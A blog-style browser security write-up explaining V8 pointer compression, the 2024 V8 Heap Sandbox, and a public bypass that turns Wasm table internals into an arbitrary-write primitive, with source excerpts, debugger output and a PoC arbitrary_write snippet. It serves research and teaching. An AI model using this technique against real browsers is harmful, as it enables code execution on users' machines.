[Wipeload Step 2] Prison Break(EN)


In Wipeload Step 1, we kicked things off with a Renderer RCE via type confusion, chained it into a Chrome Sandbox Escape, and wrapped it all up with a Windows EoP. At the end of that post, I dropped a quick spoiler about what’s coming next—anyone happen to remember what it was?

If you haven’t read Wipeload Step 1 yet >>> here <<<

In Wipeload Step 2, before we get to chaining CVE-2023-3079 → CVE-2023-21674 → CVE-2023-29360 in later posts, we’re first going to do a quick refresher on type confusion, an absolute must-know when it comes to browser exploit analysis. We’ll also crack open the concepts behind the V8 Heap Sandbox added in 2024, along with its publicly disclosed bypass methods..!

In our very first chain, we used CVE-2019-5826 for the sandbox escape. Through this post, you’ll finally figure out the real difference between that traditional sandbox and the shiny new 2024 Heap Sandbox! 😎

1. Type Confusion Recap.

We already looked into Type Confusion in Chrome during our previous series and Wipeload Step 1, right?

To recap, optimizations happen during V8 compilation, and exploiting those very optimizations allows us to confuse types. Once a type confusion occurs, the object layout breaks from what’s expected. This lets us read and write memory containing pointer values as if it were just a double array, granting us Read/Write capabilities over address values. By finely crafting this primitive, we could manipulate Function Pointers or other Code Pointers to ultimately achieve RCE in the Renderer Process!
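To make the "pointers read as doubles" idea a bit more concrete, here is a minimal sketch of the bit-reinterpretation helpers that this kind of primitive usually relies on. The names `ftoi`, `itof`, and `splitWords` are my own and not part of any V8 API; the snippet only reinterprets bits inside a scratch buffer and does not touch engine memory.

```javascript
// Shared 8-byte scratch buffer, viewed as one double and as one 64-bit integer.
const scratch = new ArrayBuffer(8);
const asF64 = new Float64Array(scratch);
const asU64 = new BigUint64Array(scratch);

// Reinterpret the bits of a double as an unsigned 64-bit integer.
function ftoi(f) {
  asF64[0] = f;
  return asU64[0];
}

// Reinterpret an unsigned 64-bit integer as a double.
function itof(i) {
  asU64[0] = BigInt.asUintN(64, i);
  return asF64[0];
}

// Split a value read as a double into its low and high 32-bit words,
// which is handy once fields are only 4 bytes wide.
function splitWords(f) {
  const bits = ftoi(f);
  return { lo: Number(bits & 0xffffffffn), hi: Number(bits >> 32n) };
}

console.log(ftoi(1.1).toString(16)); // 3ff199999999999a
```

A value leaked through a confused double array would go through `ftoi()` before being used as an address, and `itof()` does the reverse when writing.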

But because V8 was getting absolutely bombarded with these types of bugs, they eventually introduced the Heap Sandbox. 🥹

Now, I’ll pass the baton over to ji9umi to dive deeper into the V8 Heap Sandbox!!

2. V8 Heap Sandbox A-to-Z

Hey everyone! I’m ji9umi, and I’ll be taking the reins for the Renderer RCE stage in this second chain of the Wipeload project! 🌏 Honestly, diving into Chrome V8 exploit analysis wasn’t originally part of my plan at all (…) but somehow, I ended up joining the Wipeload project and have been spending some quality time getting up close and personal with V8.

stay.png

S..T..A..Y..

Alright, enough with the intro—let’s dive right in and break down the background and concepts behind the V8 Heap Sandbox!

2.1. The History of V8 Exploit

In-the-wild Chrome exploits found between 2021 and 2023—before the V8 Heap Sandbox was introduced—all had one thing in common: when memory corruption in the renderer process led to RCE, it executed with ‘Medium IL’ (standard application privileges).

About 60% of those cases happened in V8, Chrome’s JavaScript engine. The interesting part is that these bugs rarely corrupted memory directly. Even when an exploit eventually arrived at memory corruption such as UAF or OOB, getting there relied on combining multiple internal logic issues inside V8.

A perfect example of this is type confusion, which you will always see if you study Chrome vulnerabilities. Beyond CVE-2018-17463 (which we covered in Wipeload Step 1), there is also CVE-2021-38003, which uses TheHole (a special object inside V8). Even if a bug didn’t lead to memory corruption directly, attackers could still manipulate memory through these middle steps.

Because a few years separate CVE-2018-17463 and CVE-2021-38003, the environment they target differs in one notable way: Pointer Compression.

Around 2014, Chrome started switching from 32-bit to 64-bit processes. This brought benefits in security, stability, and performance, but pointers changed from 4 bytes to 8 bytes, which naturally required more memory space.

The solution to this was Pointer Compression. This method accesses objects in memory by using a base address and a 4-byte offset.

If you apply this within a 4GB-aligned memory space, all objects share the exact same base address. This means you can easily access any internal object using just a 32-bit offset.

                    |----- 32 bits -----|----- 32 bits -----|
Compressed pointer:                     |______offset_____w1|
Compressed Smi:                         |____int31_value___0|
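The layout above can be modeled in a few lines. This is only a toy sketch: the helper names are mine, and the base value is simply the upper 32 bits that show up in the DebugPrint output later in this post. It shows how the lowest bit separates a Smi from a heap pointer, and how a 32-bit offset turns back into a full 64-bit tagged pointer.

```javascript
// Toy model of V8 pointer compression; helper names are illustrative only.
const isSmi = (word) => (word & 1) === 0;      // Smis end in a 0 bit
const toSmi = (n) => (n << 1) >>> 0;           // 31-bit payload, tag bit 0
const smiValue = (word) => (word | 0) >> 1;    // arithmetic shift keeps the sign

// Rebuild the full 64-bit tagged pointer from the 4GB-aligned base
// and the 32-bit compressed value stored in the object.
const decompress = (cageBase, word) => cageBase + BigInt(word >>> 0);

const cageBase = 0x194f00000000n; // 4GB-aligned, so the low 32 bits are zero
console.log(decompress(cageBase, 0x0011b5e9).toString(16)); // 194f0011b5e9
console.log(isSmi(0x0011b5e9), smiValue(toSmi(42)));        // false 42
```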

However, not every value in V8 memory is stored within this 4GB region. Because of this, uncompressed pointers (raw pointers) still existed to access external objects. Solving this exact issue was one of the main goals behind creating the V8 Heap Sandbox.

2.2. Mechanism of V8 Heap Sandbox

The V8 Heap Sandbox is a new security mitigation introduced in March 2024, starting with Chrome version 123. In this post, we will revisit the concept of the V8 Heap Sandbox—which was briefly mentioned at the end of Chrome Exploit Part 4: Starting with Type Confusion 101 (published before the Wipeload project)—and analyze the methods used to bypass it from a technical perspective.

In the case of the two previously mentioned vulnerabilities, if memory corruption allowed arbitrary read/write access, there were no restrictions on the accessible memory area, making successful exploitation relatively smooth. The Heap Sandbox was introduced to block this, limiting access so that even if memory corruption occurs, attackers cannot access arbitrary memory addresses.

typical_chrome_exploit.png

Just a quick heads-up: the V8 Heap Sandbox and the Chrome Sandbox are two completely separate concepts, and we’ll be diving into the Chrome Sandbox in the upcoming Wipeload Step 4!

v8-heap-layout.png

The image above shows the V8 memory layout after the Heap Sandbox is applied. Since the deep technical details are already well-documented in the official docs, we’ll focus on understanding the overall architecture here.

  • V8 Heap Region

The V8 Heap Region occupies a 4GB space where compressed pointers are located, and it sits right at the starting point of the V8 Sandbox. In this region, objects are accessed using a 32-bit offset (excluding the base address). If access to an external object is needed, it references a pointer table instead.

  • V8 Sandbox

The V8 Sandbox is a large virtual address space allocated during the initialization process. As mentioned earlier, components like compressed pointers and the ArrayBuffer Backing Store live here. Objects that are inside the Sandbox but outside the V8 heap are accessed using a 40-bit offset—where the ‘V8 heap’ specifically refers to the 4GB region allocated from the very start of this space.
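Here is a rough sketch of why a 40-bit offset confines an access to the sandbox. It assumes the field stores the offset shifted left by 24 bits (64 minus 40), which is my understanding of how sandboxed pointers are encoded, so treat the constants and function names as assumptions rather than V8's exact code.

```javascript
// Assumed constants: a 40-bit offset gives a 1TB sandbox, and the field
// stores that offset in its upper 40 bits.
const SANDBOX_SIZE_LOG2 = 40n;
const SHIFT = 64n - SANDBOX_SIZE_LOG2;

// Decode a stored field into an absolute address inside the sandbox.
function decodeSandboxedPointer(sandboxBase, rawField) {
  const offset = BigInt.asUintN(64, rawField) >> SHIFT; // at most 40 bits survive
  return sandboxBase + offset;
}

// Encode an in-sandbox address back into the stored field format.
function encodeSandboxedPointer(sandboxBase, address) {
  return BigInt.asUintN(64, (address - sandboxBase) << SHIFT);
}

const sandboxBase = 0x194f00000000n;
// Even a fully attacker-controlled field decodes to an in-sandbox address.
const worstCase = decodeSandboxedPointer(sandboxBase, 0xffffffffffffffffn);
console.log(worstCase < sandboxBase + (1n << SANDBOX_SIZE_LOG2)); // true
```

The point of the design is that there is no bit pattern an attacker can write into such a field that decodes to an address outside the reserved region.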

2.3. Exploit Development Side

From an exploit perspective, this updated memory layout required a completely different strategy. To manipulate arbitrary memory areas, an uncompressed raw pointer was necessary, but the Heap Sandbox strictly limited the controllable region. As a result, achieving Medium IL RCE now required an extra step compared to before.

As of this writing, several public bypass write-ups are already available. For this post, I walked through the process by referencing the technical analyses of the sandbox bypasses used in the CVE-2023-2033 and CVE-2023-3079 exploits.

3. Bypass Heap Sandbox

The second chain we’re covering in this Wipeload project was actually featured on Theori’s tech blog. They put together a great breakdown of the V8 Heap Sandbox as well, so I used their research as a foundation to move forward.

3.1. AAW and Code Execution with WasmIndirectFunctionTable Object

3.1.1. Patch Review

The first case bypasses the sandbox by obtaining a raw pointer and an RWX page address existing inside a WebAssembly (Wasm) object. This method is well-known for being used in both CVE-2023-2033 and CVE-2023-3079 exploits.

Wasm is a software interface designed to run high-performance applications on web pages, helping web applications leverage the execution speed advantages of executable files. The vulnerability used for this sandbox bypass went through two major rounds of patching.

  1. The First Patch (commit)
    1. Changed the allocation method to remove the raw pointer that existed inside WasmIndirectFunctionTable.
    2. PRIMITIVE_ACCESSORS() → ACCESSORS()
  2. The Second Patch (commit)
    1. Since the first patch wasn’t a fundamental fix, a new method compatible with the sandbox environment was developed and applied.
    2. This introduced the ExternalPointerArray data type.
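As a reminder of why routing external references through a table is sandbox-friendly (the pointer table idea from section 2.2), here is a toy model. The class and method names are hypothetical, and it does not reflect the real layout of ExternalPointerArray or of V8's pointer table; it only illustrates that the in-sandbox object keeps an index while the raw pointer lives somewhere the attacker cannot write.

```javascript
// Toy pointer table: lives "outside" the sandbox in this model.
class ToyPointerTable {
  #entries = [];

  // Store a raw pointer with a type tag and hand back a small index.
  allocate(rawPointer, tag) {
    this.#entries.push({ rawPointer, tag });
    return this.#entries.length - 1;
  }

  // Resolve an index; an unknown index or a wrong tag never yields a pointer.
  resolve(index, expectedTag) {
    const entry = this.#entries[index];
    if (!entry || entry.tag !== expectedTag) {
      throw new Error("invalid external pointer access");
    }
    return entry.rawPointer;
  }
}

const table = new ToyPointerTable();
// The in-sandbox object would keep only this index, not the 64-bit address.
const handle = table.allocate(0xa8d0a8560n, "targets");
console.log(handle, table.resolve(handle, "targets").toString(16)); // 0 a8d0a8560
```

In this model, corrupting the index can at worst select another entry with a matching tag; it cannot conjure an arbitrary address.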

Based on these patch histories, we can infer that a field storing a raw pointer existed within WasmIndirectFunctionTable, a Wasm-related object. Before diving into the vulnerability itself, let’s take a quick look at what this object actually does.

3.1.2. Wasm Fundamentals

const tbl = new WebAssembly.Table({
    initial: 2,
    element: "anyfunc"
});
const importObject = {
    env: {
        jstimes3: (n) => 3 * n,
    },
    js: { tbl }
};
var code = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 10, 2, 96, 1, 127, 1, 127, 96, 0, 1, 127, 2, 27, 2, 3, 101, 110, 118, 8, 106, 115, 116, 105, 109, 101, 115, 51, 0, 0, 2, 106, 115, 3, 116, 98, 108, 1, 112, 0, 2, 3, 5, 4, 1, 1, 0, 0, 7, 16, 2, 6, 116, 105, 109, 101, 115, 50, 0, 3, 3, 112, 119, 110, 0, 4, 9, 8, 1, 0, 65, 0, 11, 2, 1, 2, 10, 24, 4, 4, 0, 65, 42, 11, 5, 0, 65, 211, 0, 11, 4, 0, 65, 16, 11, 6, 0, 65, 16, 16, 0, 11]);
var module = new WebAssembly.Module(code);
var instance = new WebAssembly.Instance(module, importObject);
var times2 = instance.exports.times2;

%DebugPrint(instance);

Wasm is mainly composed of a Module, an Instance, and a Table. A Module is the raw, uninitialized code, which turns into an Instance after going through an initialization process. An Instance can own multiple Tables, and in our example, we can see that tbl created inside importObject is passed along.

Within V8, an Instance is managed as a WasmInstanceObject, and its key fields are as follows:

  1. tables
    1. An array used to manage the list of received Tables. Since each Instance can contain multiple Tables, they are handled in an array format.
    2. A Table exists as a WasmTableObject.
  2. indirect_function_tables
    1. Functions created inside Wasm can be registered to the received Table.
    2. To differentiate these registered entries based on each Table, they are primarily managed within WasmIndirectFunctionTable.
    3. Following this, indirect_function_tables manages the overall information regarding these Tables.
  3. imported_function_targets
    1. Looking at the creation process of importObject, besides including tbl, it also declares jstimes3() internally.
    2. Elements passed through this mechanism are managed in the imported_function_targets field.

wasm-layout.png

The image above illustrates the reference relationships between the WasmTableObject, WasmInstanceObject, and WasmIndirectFunctionTable objects. Running the example code yields the following results:

$ ./d8 --allow-natives-syntax scripts/wasm.js --shell
DebugPrint: 0x194f0011b5e9: [WasmInstanceObject] in OldSpace  # [1] WasmInstanceObject
 - map: 0x194f00119919 <Map[224](HOLEY_ELEMENTS)> [FastProperties]
 - prototype: 0x194f001ca839 <Object map = 0x194f0011b5c1>
 - elements: 0x194f00000219 <FixedArray[0]> [HOLEY_ELEMENTS]
 - module_object: 0x194f001ccd3d <Module map = 0x194f001194dd>
 - exports_object: 0x194f001cce9d <Object map = 0x194f0011b875>
 - native_context: 0x194f00103c2d <NativeContext[282]>
 - tables: 0x194f001cce3d <FixedArray[1]>  # [2] tables
 - indirect_function_tables: 0x194f001cce49 <FixedArray[1]>  # [3] indirect_function_tables
 - imported_function_refs: 0x194f001ccdfd <FixedArray[1]>
 - indirect_function_table_refs: 0x194f001cce55 <FixedArray[2]>
 
# ...

 - imported_function_targets: 0x194f001ccded <ByteArray[8]>  # [4] imported_function_targets

# ...

DebugPrint: 0x194f001ccb01: [WasmTableObject]  # [5] WasmTableObject
 - map: 0x194f00119bb5 <Map[36](HOLEY_ELEMENTS)>
 - properties_or_hash: 0x194f00000219 <FixedArray[0]>
 - elements: 0x194f00000219 <FixedArray[0]>
 - instance: 0x194f00000251 <undefined>
 - entries: 0x194f001ccaf1 <FixedArray[2]>
 - current_length: 2
 - maximum_length: 0x194f00000251 <undefined>
 - dispatch_tables: 0x194f001cce8d <FixedArray[2]>  # [6] dispatch_tables
 - raw_type: 32000010

At [1] and [5], you can verify that the instance and tbl are created as a WasmInstanceObject and a WasmTableObject, respectively. Inside the WasmInstanceObject, the tables, indirect_function_tables, and imported_function_targets fields exist, while the WasmTableObject contains dispatch_tables.

You can manually verify this yourself by adding the --shell flag when running d8.

d8> %DebugPrintPtr(0x194f001cce3d);
DebugPrint: 0x194f001cce3d: [FixedArray]  # [1] tables of instance (0x194f0011b5e9)
 - map: 0x194f00000089 <Map(FIXED_ARRAY_TYPE)>
 - length: 1
           0: 0x194f001ccb01 <Table map = 0x194f00119bb5>  # [2] Same with tbl (0x194f001ccb01)

# ...

d8> %DebugPrintPtr(0x194f001cce8d);  # [3] dispatch_tables of tbl (0x194f001ccb01)
DebugPrint: 0x194f001cce8d: [FixedArray]
 - map: 0x194f00000089 <Map(FIXED_ARRAY_TYPE)>
 - length: 2
           0: 0x194f0011b5e9 <Instance map = 0x194f00119919>  # [4] Same with instance (0x194f0011b5e9)
           1: 0
# ...

In the initial code snippet, we couldn’t directly see the declarations for $f42 and $f83. To verify them yourself, converting the wasm code—which was originally declared as a Uint8Array—into a human-readable format yields the following text:

(module
  ;; The common type we use throughout the sample.
  (type $int2int (func (param i32) (result i32)))

  ;; Import a function named jstimes3 from the environment and call it
  ;; $jstimes3 here.
  (import "env" "jstimes3" (func $jstimes3 (type $int2int)))

  (import "js" "tbl" (table 2 funcref))
  (func $f42 (result i32) i32.const 42)  ;; [1] Define $f42 function
  (func $f83 (result i32) i32.const 83)  ;; [2] Define $f83 function
  (elem (i32.const 0) $f42 $f83)

  (func (export "times2") (type $int2int) (i32.const 16))
  (func (export "pwn") (type $int2int) (i32.const 16) (call $jstimes3))
)

Looking at points [1] and [2], you can see the declarations for both functions.

Since a full breakdown of the Wasm code will be covered at the very end of this post, feel free to refer to that section if you’d like to dive deeper into it! 🙏🏻

So, what exactly is inside the WasmIndirectFunctionTable?

/* wasm/wasm-objects-inl.h */

// WasmIndirectFunctionTable
TQ_OBJECT_CONSTRUCTORS_IMPL(WasmIndirectFunctionTable)
PRIMITIVE_ACCESSORS(WasmIndirectFunctionTable, sig_ids, uint32_t*,
                    kSigIdsOffset)
PRIMITIVE_ACCESSORS(WasmIndirectFunctionTable, targets, Address*,    // [1]
                    kTargetsOffset)
OPTIONAL_ACCESSORS(WasmIndirectFunctionTable, managed_native_allocations,
                   Foreign, kManagedNativeAllocationsOffset)

Checking the contents at [1], we can see that the WasmIndirectFunctionTable object contains a targets field. As illustrated in the previous diagram, this field holds the address information for $f42 and $f83. Recall that in the first patch, the allocation method was changed from using PRIMITIVE_ACCESSORS to ACCESSORS.

d8> %DebugPrintPtr(0x325b001ccea9);
DebugPrint: 0x325b001ccea9: [WasmIndirectFunctionTable]
 - map: 0x325b00001599 <Map[32](WASM_INDIRECT_FUNCTION_TABLE_TYPE)>
 - size: 2
 - sig_ids: 0xa8d0a8550
 - targets: 0xa8d0a8560
 
 # ...
 
 (lldb) memory read -s8 -fx -c4 0xa8d0a8560
0xa8d0a8560: 0x000010a051b08000 0x000010a051b08004
0xa8d0a8570: 0x0000000a8cc50338 0x0000000a8cc50320

If you attach a debugger and inspect the value of the targets field yourself, you can see that a 64-bit address is stored there instead of a 32-bit offset. These addresses point to $f42 and $f83 in order, and further analysis yields the following details:

(lldb) memory read -s8 -fi 0x000010a051b08000
    0x10a051b08000: b      0x10a051b086a0
    0x10a051b08004: b      0x10a051b086ac
    0x10a051b08008: b      0x10a051b086b8
    0x10a051b0800c: b      0x10a051b086c4
    
(lldb) memory read -fi -c3 0x10a051b086a0
    0x10a051b086a0: mov    w8, #0x1 ; =1 
    0x10a051b086a4: b      0x10a051b08130
    0x10a051b086a8: nop

The pointers stored at 0xa8d0a8560 and 0xa8d0a8568 point into a jump table made of branch instructions, which is why they are only 4 bytes apart. Following one of those branches takes us one step further, to the address the table entry actually targets.

3.1.3. Construct Primitive

Now that we understand what kind of values are stored in the targets field, we need to look into how we can actually leverage them. To set a value in this specific field, the WasmIndirectFunctionTable::Set() function is used, which is implemented as follows:

/* wasm/wasm-objects.cc */

void WasmIndirectFunctionTable::Set(uint32_t index, int sig_id,
                                    Address call_target, Object ref) {
  sig_ids()[index] = sig_id;
  targets()[index] = call_target;
  refs().set(index, ref);
}

Looking at the code, we can confirm that the call_target value passed as an argument is written to the memory location pointed to by targets. The core realization here was that if an attacker could manipulate this location, it would enable an arbitrary write primitive.

The next piece of information needed was to verify whether call_target is a value the attacker can control, and if so, what address it should be directed to point to. First of all, the WasmIndirectFunctionTable::Set() function is called inside WasmTableObject::Set(), which can be triggered via the JavaScript API WebAssembly.Table.prototype.set().

// https://github.com/theori-io/v8-sbx-bypass-wasm

  let arbitrary_write = (where, what) => {
    caged_write64(where_ptr, where - 0x8n);
    caged_write64(what_ptr, what);
    tbl.set(1, times2);
    caged_write64(what_ptr, rwx);
    caged_write64(where_ptr, targets);
  };
  
// ...

This corresponds to the tbl.set() call in the publicly available PoC example. The index passed as an argument was not an issue since it directly uses the value provided by the user. However, for call_target, the caller utilizes the return value of WasmInstanceObject::GetCallTarget().

Address WasmInstanceObject::GetCallTarget(uint32_t func_index) {
  wasm::NativeModule* native_module = module_object().native_module();
  if (func_index < native_module->num_imported_functions()) {
    return imported_function_targets().get(func_index);
  }
  return jump_table_start() +
         JumpTableOffset(native_module->module(), func_index);
}

Since the return value of this function was determined by func_index, it posed a significant constraint on specifying an arbitrary address. If func_index falls within the range of imported functions, the value is returned from imported_function_targets; otherwise, it returns an address calculated by adding an offset to jump_table_start().

imported_function_targets is a field that holds the locations of functions passed from the outside during instance creation. Debugging the pointers it references internally confirms that they point directly to an RWX memory region.

DebugPrint: 0x325b0011b5e9: [WasmInstanceObject] in OldSpace
 - map: 0x325b00119919 <Map[224](HOLEY_ELEMENTS)> [FastProperties]
 - prototype: 0x325b001ca87d <Object map = 0x325b0011b5c1>
 - elements: 0x325b00000219 <FixedArray[0]> [HOLEY_ELEMENTS]
# ...
 - imported_function_targets: 0x325b001cce31 <ByteArray[8]>    # <== imported_function_targets
 
(lldb) memory read -s8 -fx -c2 0x325b001cce31-1
0x325b001cce30: 0x000000100000095d 0x000010a051b086e0

(lldb) memory region 0x000010a051b086e0
[0x000010a051b08000-0x000010a051b0c000) rwx        # <== RWX page
Modified memory (dirty) page list provided, 0 entries.
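The two return paths of GetCallTarget() can be modeled as follows. This is a sketch, not V8 code: the addresses are copied from the lldb output in this post, and the 4-byte slot size is an assumption read off the arm64 jump table dump (the real JumpTableOffset() depends on the architecture).

```javascript
// Assumption: one jump table slot is a single 4-byte branch, as seen in the dump.
const JUMP_TABLE_SLOT_SIZE = 4n;

// Simplified model of WasmInstanceObject::GetCallTarget().
function getCallTarget(instance, funcIndex) {
  const imported = instance.importedFunctionTargets;
  if (funcIndex < imported.length) {
    return imported[funcIndex]; // imported range: value read from the array
  }
  const slot = BigInt(funcIndex - imported.length);
  return instance.jumpTableStart + slot * JUMP_TABLE_SLOT_SIZE;
}

const instanceModel = {
  importedFunctionTargets: [0x10a051b086e0n], // index 0: jstimes3
  jumpTableStart: 0x10a051b08000n,
};

for (const index of [0, 1, 2]) {
  console.log(index, getCallTarget(instanceModel, index).toString(16));
}
// 0 10a051b086e0
// 1 10a051b08000
// 2 10a051b08004
```

Indexes 1 and 2 reproduce the two values seen earlier in the targets field, while index 0 is the only one whose result comes from data rather than from a computed offset.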

Next, having confirmed how to obtain the RWX page address and where the call_target value comes from, we examined the execution path required to reach the actual vulnerable logic.

The journey begins at WasmTableObject::Set(), which is the underlying implementation of WebAssembly.Table.prototype.set().

// wasm/wasm-objects.cc

// TODO(manoskouk): Does this need to be handlified?
void WasmTableObject::Set(Isolate* isolate, Handle<WasmTableObject> table,
                          uint32_t index, Handle<Object> entry) {
  // Callers need to perform bounds checks, type check, and error handling.
  DCHECK(IsInBounds(isolate, table, index));

  Handle<FixedArray> entries(table->entries(), isolate);
  // The FixedArray is addressed with int's.
  int entry_index = static_cast<int>(index);

  switch (table->type().heap_representation()) {
// ...
    default:
      DCHECK(!table->instance().IsUndefined());
      if (WasmInstanceObject::cast(table->instance())
              .module()
              ->has_signature(table->type().ref_index())) {
        SetFunctionTableEntry(isolate, table, entries, entry_index, entry); // <== here
        return;
      }
      entries->set(entry_index, *entry);
      return;
  }
}

Inside this function, a switch-case statement is used to route the execution to different processing functions based on the table’s type. Since the target function we want to reach requires passing through SetFunctionTableEntry(), it is processed under the default case, which does not match any of the predefined conditions.

// wasm/wasm-objects.cc

void WasmTableObject::SetFunctionTableEntry(Isolate* isolate,
                                            Handle<WasmTableObject> table,
                                            Handle<FixedArray> entries,
                                            int entry_index,
                                            Handle<Object> entry) {
// ...
  if (WasmExportedFunction::IsWasmExportedFunction(*external)) {  // Check is exported
    auto exported_function = Handle<WasmExportedFunction>::cast(external);
    Handle<WasmInstanceObject> target_instance(exported_function->instance(),
                                               isolate);
    int func_index = exported_function->function_index();
    auto* wasm_function = &target_instance->module()->functions[func_index];
    UpdateDispatchTables(isolate, *table, entry_index, wasm_function,
                         *target_instance);
  } else if (WasmJSFunction::IsWasmJSFunction(*external)) {
    UpdateDispatchTables(isolate, table, entry_index,
                         Handle<WasmJSFunction>::cast(external));
  } else {
    DCHECK(WasmCapiFunction::IsWasmCapiFunction(*external));
    UpdateDispatchTables(isolate, table, entry_index,
                         Handle<WasmCapiFunction>::cast(external));
  }
  entries->set(entry_index, *entry);
}

Inside the WasmTableObject::SetFunctionTableEntry() function, the behavior varies depending on the location of the target function. The vulnerable logic can be reached specifically when the function is ‘exported’. The other two cases, despite sharing the same function name, are handled by overloaded functions with different parameters, so careful attention is required.

// static
void WasmTableObject::UpdateDispatchTables(Isolate* isolate,
                                           WasmTableObject table,
                                           int entry_index,
                                           const wasm::WasmFunction* func,
                                           WasmInstanceObject target_instance) {
// ...

  Address call_target = target_instance.GetCallTarget(func->func_index);

  int original_sig_id = func->sig_index;

  for (int i = 0, len = dispatch_tables.length(); i < len;
       i += kDispatchTableNumElements) {
    int table_index =
        Smi::cast(dispatch_tables.get(i + kDispatchTableIndexOffset)).value();
    WasmInstanceObject instance = WasmInstanceObject::cast(
        dispatch_tables.get(i + kDispatchTableInstanceOffset));
    int sig_id = target_instance.module()
                     ->isorecursive_canonical_type_ids[original_sig_id];
    WasmIndirectFunctionTable ift = WasmIndirectFunctionTable::cast(
        instance.indirect_function_tables().get(table_index));
    ift.Set(entry_index, sig_id, call_target, call_ref);
  }
}

Once we reach the WasmTableObject::UpdateDispatchTables() function, we can finally observe the previously explained GetCallTarget() and WasmIndirectFunctionTable::Set() functions in action.

Reviewing the entire call stack clarifies that the function being passed must satisfy the ‘exported’ condition to proceed.
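From the JavaScript side, the "exported" requirement is easy to observe without a debugger. The sketch below reuses the module bytes and import object from section 3.1.2 (variable names slightly changed) and shows that a function taken from instance.exports is accepted by Table.prototype.set(), while a plain JS closure is rejected by the API with a TypeError before it ever reaches the dispatch table update.

```javascript
const tbl = new WebAssembly.Table({ initial: 2, element: "anyfunc" });
const importObject = { env: { jstimes3: (n) => 3 * n }, js: { tbl } };
const code = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 10, 2, 96, 1, 127, 1, 127, 96, 0, 1, 127, 2, 27, 2, 3, 101, 110, 118, 8, 106, 115, 116, 105, 109, 101, 115, 51, 0, 0, 2, 106, 115, 3, 116, 98, 108, 1, 112, 0, 2, 3, 5, 4, 1, 1, 0, 0, 7, 16, 2, 6, 116, 105, 109, 101, 115, 50, 0, 3, 3, 112, 119, 110, 0, 4, 9, 8, 1, 0, 65, 0, 11, 2, 1, 2, 10, 24, 4, 4, 0, 65, 42, 11, 5, 0, 65, 211, 0, 11, 4, 0, 65, 16, 11, 6, 0, 65, 16, 16, 0, 11]);
const wasmModule = new WebAssembly.Module(code);
const instance = new WebAssembly.Instance(wasmModule, importObject);

// An exported Wasm function is accepted and ends up in the table slot.
tbl.set(1, instance.exports.times2);
const slotResult = tbl.get(1)(7); // times2 ignores its argument and returns 16

// A plain JS closure is not a valid funcref, so the API throws a TypeError.
let rejected = false;
try {
  tbl.set(1, (n) => n);
} catch (e) {
  rejected = e instanceof TypeError;
}

console.log(slotResult, rejected); // 16 true
```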

hmmm.jpg

Wait a minute, did you catch the anomaly here?

Looking at how the call_target value is determined, the RWX page address is stored in imported_function_targets, and it is only returned when the func_index value falls within the imported range.

However, to actually reach the vulnerable logic, the target function must be ‘exported’. Generally, it is impossible for an exported function to be assigned an index that falls within the imported range.

Although both imported_function_targets and jump_table_start reside within the V8 sandbox, the former uses compressed pointers while the latter uses raw pointers. At a stage where an arbitrary address write is not yet established, we cannot manipulate the address pointed to by jump_table_start. Therefore, we must leverage the controllable imported_function_targets instead.

To resolve this conflict, the referenced write-up used a method to forge the exported function’s index to 0. This was entirely possible because obtaining the function_index requires accessing the WasmExportedFunctionData object, which also resides inside the V8 sandbox.

Naturally, to utilize this method, at least one imported function must exist!

Consequently, the final exploit flow proceeds as follows:

  1. Create a Wasm Table and an Instance that imports it.
  2. Corrupt the targets of the WasmIndirectFunctionTable inside the WasmInstanceObject to an arbitrary address.
    1. This corrupted address becomes the ‘where’ in the AAW (Arbitrary Address Write) primitive.
  3. Forge the function_index of the exported function to 0.
  4. Modify the contents at the address pointed to by imported_function_targets to an arbitrary value.
    1. This modified value becomes the ‘what’ in the AAW primitive.
  5. Finally, invoke WebAssembly.Table.prototype.set().
    1. Through the internal logic, this writes ‘what’ into the ‘where’ location.
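The five steps above can be replayed against a toy memory model. Nothing here touches real memory: `memory` is a plain Map, `state` stands in for the in-sandbox fields an attacker is assumed to control already, and all names are hypothetical. It also shows why the public PoC passes `where - 0x8n`: index 1 is used in the set() call, so the write lands at targets + 8.

```javascript
// Toy memory: address (BigInt) -> 64-bit value (BigInt).
const memory = new Map();
const write64 = (addr, value) => memory.set(addr, value);
const read64 = (addr) => (memory.has(addr) ? memory.get(addr) : 0n);

// In-sandbox fields, with values taken from the debug output in this post.
const state = {
  targets: 0xa8d0a8560n,                      // WasmIndirectFunctionTable.targets
  functionIndex: 3,                           // function_index of exported times2
  importedFunctionTargets: [0x10a051b086e0n], // entry for jstimes3
  jumpTableStart: 0x10a051b08000n,
};

// Model of GetCallTarget(): imported range reads data, otherwise computes a slot.
function getCallTarget(funcIndex) {
  const imported = state.importedFunctionTargets;
  if (funcIndex < imported.length) return imported[funcIndex];
  return state.jumpTableStart + BigInt(funcIndex - imported.length) * 4n;
}

// Model of Table.prototype.set(): targets()[index] = call_target.
function tableSet(index) {
  write64(state.targets + BigInt(index) * 8n, getCallTarget(state.functionIndex));
}

function arbitraryWrite(where, what) {
  const savedTargets = state.targets;
  const savedImport = state.importedFunctionTargets[0];
  state.targets = where - 8n;               // step 2: index 1 adds 8 back
  state.functionIndex = 0;                  // step 3: forge function_index
  state.importedFunctionTargets[0] = what;  // step 4: choose the value
  tableSet(1);                              // step 5: trigger the write
  state.importedFunctionTargets[0] = savedImport;
  state.targets = savedTargets;
}

arbitraryWrite(0x4141414141414140n, 0xdeadbeefn);
console.log(read64(0x4141414141414140n).toString(16)); // deadbeef
```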

Once arbitrary address write is achieved, executing arbitrary code becomes possible as well.

Since the process above writes 8 bytes (corresponding to a pointer size) to an arbitrary address, you can write the desired shellcode into the RWX page 8 bytes at a time, and then call it to execute the injected shellcode.
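Splitting a payload into pointer-sized pieces is plain byte packing. A small sketch, assuming a little-endian target and zero padding for the last chunk (both are my assumptions, as is the helper name):

```javascript
// Pack a byte sequence into little-endian 64-bit words, padding the tail.
function toQwords(bytes, pad = 0x00) {
  const padded = Array.from(bytes);
  while (padded.length % 8 !== 0) padded.push(pad);

  const words = [];
  for (let i = 0; i < padded.length; i += 8) {
    let word = 0n;
    // Highest byte first, so byte i ends up in the lowest 8 bits.
    for (let j = 7; j >= 0; j--) {
      word = (word << 8n) | BigInt(padded[i + j]);
    }
    words.push(word);
  }
  return words;
}

// Placeholder bytes, only to show the packing.
const words = toQwords([1, 2, 3, 4, 5, 6, 7, 8, 9]);
console.log(words.map((w) => w.toString(16))); // [ '807060504030201', '9' ]
```

Each resulting word would then be written at base + 8 * i with a write primitive such as the PoC's arbitrary_write(where, what).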

3.1.4. Wasm Syntax

